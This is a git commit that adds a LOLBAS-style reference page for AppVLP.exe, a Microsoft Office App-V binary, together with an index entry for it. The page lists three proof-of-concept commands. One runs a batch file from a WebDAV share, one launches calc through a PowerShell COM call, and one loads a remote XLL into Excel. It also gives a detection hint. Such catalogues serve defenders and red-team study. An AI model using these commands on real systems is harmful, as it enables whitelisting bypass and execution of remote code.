Appvlp.exe

master
Oddvar Moe 2018-05-09 15:47:26 +02:00
parent 118c337dfb
commit 91cd6adec3
2 changed files with 36 additions and 0 deletions

View File

@ -5,6 +5,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
# OS BINARIES
[Atbroker.exe](OSBinaries/Atbroker.md)
[Appvlp.exe](OSBinaries/Appvlp.md)
[Bash.exe](OSBinaries/Bash.md)
[Bitsadmin.exe](OSBinaries/Bitsadmin.md)
[Certutil.exe](OSBinaries/Certutil.md)

35
OSBinaries/Appvlp.md Normal file
View File

@ -0,0 +1,35 @@
## Appvlp.exe
* Functions: Execute
```
AppVLP.exe \\webdav\calc.bat
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe', '', '', 'open', 1)"
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
```
Acknowledgements:
* Will - @moo_hax
Code sample:
*
Resources:
* https://github.com/MoooKitty/Code-Execution
* https://twitter.com/moo_hax/status/892388990686347264
Full path:
```
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe"
```
Notes:
Used by App-V
Detection:
Appvlp.exe spawning other process